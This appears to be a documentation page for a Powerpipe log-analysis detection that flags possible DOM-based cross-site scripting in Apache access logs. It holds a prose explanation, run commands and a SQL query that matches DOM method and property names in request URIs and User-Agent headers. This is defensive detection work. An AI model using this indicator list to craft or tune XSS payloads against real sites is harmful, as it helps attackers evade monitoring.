Detection: Cross-Site Scripting DOM Based
Overview
The DOM-Based XSS Attack detection identifies potential Cross-Site Scripting (XSS) attacks that specifically target JavaScript Document Object Model (DOM) manipulation. Unlike traditional XSS attacks that focus on server-side vulnerabilities, DOM-based XSS exploits client-side JavaScript that dynamically modifies the page's DOM.
This detection examines both HTTP requests and User-Agent headers for JavaScript DOM manipulation methods and properties commonly used in DOM-based XSS attacks. It looks for patterns like document.getElementById, document.querySelector, innerHTML, outerHTML, and various document location properties that can be used to introduce malicious code into the page.
DOM-based XSS attacks are particularly dangerous because they often bypass traditional server-side XSS protections. The vulnerability occurs when client-side JavaScript code improperly handles data from untrusted sources (like URL parameters or form inputs) and uses it to modify the DOM without adequate sanitization. For example, an application might take a value from the URL and insert it into the page using innerHTML, allowing an attacker to inject malicious script.
These attacks typically target single-page applications, complex web interfaces, and sites with significant client-side functionality. By examining both request URIs and User-Agent headers, this detection can identify attackers who attempt to evade security controls by hiding their payloads in HTTP headers rather than request parameters.
This comprehensive approach helps security teams identify sophisticated DOM-based XSS attempts targeting their web applications, which might otherwise evade detection by traditional server-side security controls.
References:
Usage
Run the detection in your terminal:
powerpipe detection run apache_access_log_detections.detection.cross_site_scripting_dom_basedSnapshot and share results via Turbot Pipes:
powerpipe loginpowerpipe detection run apache_access_log_detections.detection.cross_site_scripting_dom_based --shareSQL
This detection uses a named query:
select tp_timestamp as timestamp,request_method as operation,request_uri as resource,status,http_user_agent as actor,tp_source_ip as source_ip,tp_id as source_id,-- Create new aliases to preserve original row datastatus as status_src,timestamp as timestamp_src,*exclude (status, timestamp)
from apache_access_logwhere ( request_uri is not null and ( -- DOM manipulation methods request_uri ilike '%document.getElementById%' or request_uri ilike '%document.querySelector%' or request_uri ilike '%document.write%' or request_uri ilike '%innerHTML%' or request_uri ilike '%outerHTML%' or request_uri ilike '%document.location%' or request_uri ilike '%window.location%' or request_uri ilike '%document.URL%' or request_uri ilike '%document.documentURI%' or request_uri ilike '%document.referrer%' or request_uri ilike '%window.name%' or request_uri ilike '%location.hash%' or request_uri ilike '%location.search%' or request_uri ilike '%location.href%' ) ) or ( http_user_agent is not null and ( -- DOM manipulation methods http_user_agent ilike '%document.getElementById%' or http_user_agent ilike '%document.querySelector%' or http_user_agent ilike '%document.write%' or http_user_agent ilike '%innerHTML%' or http_user_agent ilike '%outerHTML%' or http_user_agent ilike '%document.location%' or http_user_agent ilike '%window.location%' or http_user_agent ilike '%document.URL%' or http_user_agent ilike '%document.documentURI%' or http_user_agent ilike '%document.referrer%' or http_user_agent ilike '%window.name%' or http_user_agent ilike '%location.hash%' or http_user_agent ilike '%location.search%' or http_user_agent ilike '%location.href%' ) )order by tp_timestamp desc;